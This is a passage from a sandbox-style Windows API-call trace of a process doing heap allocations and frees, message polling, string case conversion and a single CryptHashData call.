| out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.154] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0161.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.154] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0161.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.154] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.155] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0161.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x34aa3d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.158] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.159] CryptHashData (hHash=0xaa5660, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0161.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0161.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.169] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.170] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.170] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.170] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.171] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.171] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.172] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.172] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.172] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, 